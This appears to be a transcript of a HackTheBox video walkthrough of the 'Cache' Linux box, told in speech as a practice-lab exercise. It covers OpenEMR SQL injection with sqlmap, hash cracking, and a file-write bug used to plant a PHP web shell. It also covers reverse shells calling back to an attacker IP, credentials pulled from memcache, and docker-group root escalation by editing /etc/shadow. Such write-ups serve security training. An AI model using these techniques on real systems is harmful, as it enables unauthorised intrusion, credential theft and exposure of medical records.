What's up, everyone? Today I'm doing cache from HackTheBox. This was a Linux box with a medium difficulty. For this box, we start off with our Nmap scan and we find a web server and some credentials in the source code. And after reading the web page, we discover that there might be some other hosts on the box. So we use ffuf to find a virtual host that is vulnerable to a SQL injection, where we dump the credentials and get logged into the application. From there, we can use an exploit that executes code and swap over to the user Ash. And we pivot to the user Lenny after finding his credentials in memcache. And for root, we use Docker to mount the file system and change into a chroot shell. So let's get started. Okay, we're going to start this box off with nmap sv scoa, put it in the nmap directory, and we'll call it cache. And the IP address is 10.10.10.188. I've already run this, so let's take a look at the output. And there's not much to look at, just port 22, SSH, and port 80 are open, and we can see the title. So let's go check this out in Firefox. Okay, we just see welcome to cache.htb with a marquee. And we see a bunch of information about the site. What is cybercrime? What is a hacker? The different types of hackers. So which one are you? We have some news and home, contact us. We have an author, Ash, co-founder. Check out his other projects like Cache, so HMS, Hospital Management System. That might be another host that's on the box. And looking at the source code, we don't see a whole lot. We see login HTML. And we have a jQuery function at functionality.js. And in here, it looks like there is a hard-coded password. So we'll take note of this. So functionality.js had a password. There we go. Okay, coming back over here. Username is Ash. So we'll grab that. Okay. I'm going to grab this out of our notes real quick, just so I have it on the clipboard. Coming back over here, we have a login page, so let's see if we can log in as Ash. And we see a character from One Piece. Welcome back. This page is still under construction. Net HTML. So is there anything in here? No, just a picture. So there's not a whole lot to go off of here. So what we can do is we can start virtual host discovery. So we'll go into Etsy hosts. We'll add in 10.10.10.188, and we know that that is cache.htb. Okay, so now we need to do virtual host discovery. And to do that, we can use ffuf, and the URL we're going to be hitting is http cache.htb. The word list we can just use out of seclists, discovery DNS, and we'll do the top, what is it, subdomains, top 1 million, and we'll do 20,000. Okay, and the host header we're fuzzing is fuzz.htb, and we'll do this, see all the wildcards, or all of the same size return, and we will filter this out with filter size, give it that size, let this run, and hopefully we get a result. Okay, and it looks like we just got a response, HMS, which was the same thing we saw on the about page for the author. So in Etsy hosts, we can add this here, hms.htb, and we'll go check it out. So it looks like we have an openemr instance here. And just at first glance, we can search exploit openemr, and we get a whole bunch of results. So we need to figure out what version we're running. So head over to Google, and we can look at, well, let me turn the proxy off. We can look for openemr exploits. And a few links down, we have a vulnerability report. And in here, it looks like there are multiple instances of SQL injection. Is there anything in here about version? Okay, so that's all SQL injection, version information. Okay, so it looks like admin PHP might have the version. So in the openemr directory /admin.php. So we'll come over here and check out admin.php. And it looks like we are running 5.013. So we can go back into our notes. And we have hms.htb. We have openemr with 5.01. Perfect. Okay, save our notes. Let's head back over here, or we can look at search exploit again and see if there were any 5.013. And there's an authenticated arbitrary file actions less than 5.01. That doesn't include us. So 5.013 has this at a minimum. So let's go ahead and copy this here in case we need it for later. Oh, I didn't actually copy it. Openemr. Okay, we'll just copy it with -m for mirror, and we'll just move it to openemr file actions. Okay, heading back over to the PDF. It looks like we have a lot of SQL injection. And it looks like there might be an authentication bypass, which would be great. If we could do that, then we might have the ability to exploit this further. So it says an unauthenticated user is able to bypass the patient portal login simply by navigating to the registration page and modifying the requested URL to access the desired page. So we can go see if there's a portal. And it looks like this is the patient portal login. And here's the register. So if we go to the register, and then it says simply by navigating to the registration page, which we're on, and modifying the requested URL to access the desired page. So if we wanted to go to add edit event user, copy this, come over here and see if we can access this page. Oh, we get a 404. Is it under portal? It's under portal. Okay, so we can access that. If we were to visit this same thing in a private window, would we be able to access it? No, it redirects us and gives us an oops, something went wrong. It redirects us to the patient portal login. So it looks like we've kind of bypassed logging in and can access this add edit event user. So going back to read more about this PDF, there are some SQL injections. So there is a SQL injection and find appointment pop-up user. So if we went find appointment pop-up user, and it looks like the SQL injection starts with category ID or cat ID. So if you head over here and go to this page, and we do cat ID equals 1, cat ID equals 1 with a single quote, we definitely get a SQL error. So what I'm going to do is just copy this, and we'll pass it to sqlmap. Do it over here. Okay, so we'll just run sqlmap and the URL. Oh, and we get a redirect because we have to bypass that login. So we can do the same thing and we can pass it a cookie, or we could just copy the whole request, depending on if we can grab the cookie. We'll turn intercept on, turn our proxy on, intercept that request, and grab our cookie. Pass this to sqlmap, and see if we get any responses. We'll let this run. It looks like the backend is MySQL. Do you want to skip other payloads? Yes. Yes. And we'll see if this finds anything with the default. Okay, so it looks like get parameter category ID appears to be blind inject. There's like a whole lot of these that it flagged, so we can go ahead with the fuzzy test and let this finish. Okay, so sqlmap kind of comes back and tells us, hey, here are your payloads. This is what we found. So if I were to just grab this, turn our intercept off, pass the payload, malform GTID set specification. Does that happen when we do this? No. So with this, we may be able to, we can dump the entire thing, or I think we can minus dbs to show the databases. And it'll show us, look, there's 2 databases available, openemr and information schema. I think this one's default, so this one's probably the one we want to go after. And we're going to try to get some users out of it. So we can do -d for database, and we can say openemr, and we want to get the tables. Oh, I guess it's 1 dash. Okay, so it's going through and grabbing all these tables. I'll let it finish and we'll pick out the interesting ones. Okay, so it just finished, and the ones that stick out to me are user secure, users in users facilities, and maybe even user settings. So we can change this to -T, and we can type the table that we want. So we'll go with users, and then we'll do -- columns to show the columns. And so we see a lot of columns here. Just gonna go on for a while, isn't it? Okay, so then let's look at the other one. We did see users and passwords, so if we did -dump and let this run, do we get anything interesting? Okay, just watching this kind of fly by, there's not like a whole lot of interesting stuff that is coming out of it, so I'm gonna go after that next table, which was user secure, and we can dump that one. And we definitely get some interesting stuff out of this one. So it's kind of hard to read the way this is, but we can see it definitely it grabbed some kind of hash. And if we were to read this, we can see the username is openemr admin. So we'll put this in our notes. So SQL injection. And I'm going to paste the URL of this PDF. And then we have openemr admin. And we have a salt history and a password history. Or we have ID, salt, and then password. So this is, I'm assuming the salt here. And then the password, which is this. Okay, so we'll save that. Okay, so now we can try to crack the hash, and we'll just create a file called hash, paste it in, pass it to John, and we'll use the word list. User share word list rock you. And our file is hash. Okay, it looks like it cracked it pretty much instantly because it's just 6 X's. We'll put this in our notes. Open EMR admin. Save that. And we'll go to hms.htb. Okay, there we go. Okay, and open EMR admin. And our X's. And see if it lets us log in. Okay, so now that we're logged in, we have that file from earlier, which was the file actions. And let's go ahead and look through this. So it looks like we have arbitrary file read, arbitrary file write. That's perfect. That means we might be able to get code execution. So we'll pretty much just kind of copy this request and we'll grab the pieces we need out of it. Perfect. So then we'll come back over here. We'll intercept the request. There we go. It's not intercepting. There we go. Okay, intercept the request. Come over here, send this to repeater. And we'll kind of paste in this request just so we can grab the endpoint that we're after. And I think we can get rid of this because there's no open EMR directory. It's just straight into portal. And the rest of this is pretty much fine because we need our own cookie. So all it's doing is, looks like it's saving payload.php with this content. So we can replace this and see if system, or we'll do echo system, who am I? Send that through. Looks like we got a 200 okay. So if we go check out payload.php, I guess we should turn intercept off and go check out payload.php. Is it under portal? Portal. Still nothing. Interesting. Okay, so did we miss something? Oh, I think we need content type in there. There we go. There we go. Okay, so then we'll send this. Okay, we get a different response back. Okay, so coming back over here, looking at payload, we have PHP info. Oh, we didn't change this, but it looks like it's definitely working. So we can try echo system again to see if we can call this command directly. Who am I? Send that through. And it says we're www data. Okay, so from here, we could just do echo system get, and we'll do C. And then we can pass in a parameter here and say C is ls, or C is who am I? That doesn't seem to be working. Maybe we need to get rid of the echo here. And maybe those quotes. Send that through. Who am I? There we go. ls. Okay, so we see a lot of stuff here. So now let's try to get a shell. So we could try which netcat, bin netcat. So we could do bin nc minus e, bin sh, our IP address, which is 10.10.14.13, and we'll do 1337. Come over here, set up a listener, send that through. We don't get a callback, so we'll go grab pentest monkey, reverse shell, and try the other netcat one. Okay, so here we go. And if this fails, we know we have PHP in the box, so we could probably just do a full-blown php-reverse shell. So 10, 14, 13, 1337. Send this. And no connect back. So what else do we have? PHP. And 10, 14, 13, 1337. Send that. Still no connect back. Interesting. Okay, so can we do, just as troubleshooting, can we tcpdump minus I times 0 ICMP to listen for ICMP packets? And we'll do ping minus C4, 10, 10, 14, 13. Okay, so we're definitely getting the ping back, so that works fine. So what we can do instead is just, we will copy user share laudenum PHP reverse shell, or is it reverse PHP shell? PHP reverse shell. And we'll modify this to our IP address, 10.10.14.13, and we'll do port 1337. And we'll just go ahead and cat that entire thing out. Copy it. Head over to repeater, and where this is, we will just paste this entire thing in and see if this works. Send it. Looks all right. We'll come back over here, get rid of our ping command, and just run the payload. We get a connection refused. Oh, we're not listening. So we need to set up a listener. On 1337. run this. It's loading, and we get a connection back. Okay, so from here, let's get a clean shell, which Python. Okay, Python wasn't even on the box, which Python 3. Python 3 is on the box, so we can do Python 3 -c import pty.spawn bin bash. Okay, and now we have a better shell, so we'll just Control Z, stty raw -echo, type fg, enter, and now we have tab completion. We'll do one more thing and export term to be screen, so that clear and Control L work. Okay, so now if we look at home, who do we have here? We have Ash and Luffy, and if we remember from earlier, we can look at our notes. And we have Ash and have fun, so we can try to swap over to the user Ash. Throw in the password, and we're able to become Ash. So from here, if we go to the home directory, we have user.text, and that's user complete. So we did see another interesting user, which was Luffy. And if we tried to sudo as Ash, we can't do anything. If we look at our groups, we're just an Ash ID. We're not anyone important, so maybe we're gonna look to try to pivot to Luffy. So first things is to see if we can go into his directory. And we can't. Are there any processes running? Nothing there. What ports are listening? We have MySQL on 3306, which we've already connected to. We have 1121, which is memcache. So if we were to telnet to 127.0.0.1, 112.1.1, looks like we're connected. And this definitely seems like memcache, so we could stats items. And it shows us a whole bunch of stuff. So maybe we could stat cache dump. No, it doesn't like that. Stats cache dump. Okay. Stats cache dump 1. Stats cache dump 1. Okay, so I think this is the amount maybe. So if we did stats cache dump 1, 2, it shows us 2 results, and we have link and user, so we could, is it get key? Or get the name of the key, which is get link? Yeah, okay, so get link will return the value of the key. So that's our link. So if we stats cache dump like 20 of these, or stats cache dump 0, 20 of these, there's nothing. Oh, because that's a 0. Stats cache dump 1 and 20 of these. It looks like there might only be 5 keys there, but we have link, user, password, file, and account. So the ones that look interesting are obviously user and password. So we can get user, and it's Luffy, and get password, and it's One Piece. So we'll add this to our notes. Luffy and One Piece, which kind of fits in line from the picture we saw earlier. So we need to get out of here. Can we just do that and then quit? Okay, so we'll try to swap over to Luffy with our One Piece password, and now we're Luffy. So same thing with Luffy. Who am I? ID to see if any groups we're in. We can see that we're in Docker. So just looking at GTFO bins for Docker, because GTFO bins is a great place to kind of see if you're a part of any strange groups or non-standard groups. There might be a way to privesc or to do something specific with sudo. So if we look for Docker, we can see that there is a shell. It can be used to break out of restricted environments by spawning an interactive system shell, resulting in a root shell. So if we try to run this, it's unable to find Alpine locally, so that's not going to work. So maybe we can use Docker to see what images we do have locally with image ls, and we see Ubuntu. So we can just maybe replace that. And run it. And in here, it definitely does look like we're root. And let me run through this command kind of to show you what it's doing. Is it looks like it's mounting the root file system, and then it's just dropping us in its root shell under mount where it mounted it, and running sh. So we can read the entire file system. So if we go into home and we look, we see Ash and Luffy. We can also go into root and look in here, and we see root.txt. And I think we can even write to this file system. Yeah, we can write to it. The only issue is if we were to look at the host name, we're running in a Docker container. So if we wanted to break out of that, we have a couple options. We could maybe change the authorized keys for root, but then we would need to restart SSH, which we can't do because we're in a container. And another way is maybe modifying Etsy Shadow. So if we go into Etsy Shadow, do we have Vim? We do. So if we just Vim Etsy Shadow, and we see roots, and we see Ash. So if we just copy Ash, we'll paste that in, and we'll delete until the colon. And so if we save this and we try to SSH in, do we still have one piece on the clipboard? No. We look at our notes. Can we SSH in as Luffy? Put the password? Yes, we can. Okay, great. So if we look at our notes one more time, grab Ash as password. If we try to swap over to root, put in the password, we're able to become root. So now if we look at the host name, we're actually root at cache. And hostname. So this way you had access to the entire file system. Only issue is that you are running in a container, so you have a different IP. You can't spawn a reverse shell from here or anything like that. But this way, by changing Etsy Shadow, we're able to reuse Ash's password to drop into a root shell. So that's pretty much the video. I hope y'all enjoyed it, and I'll catch you guys next week.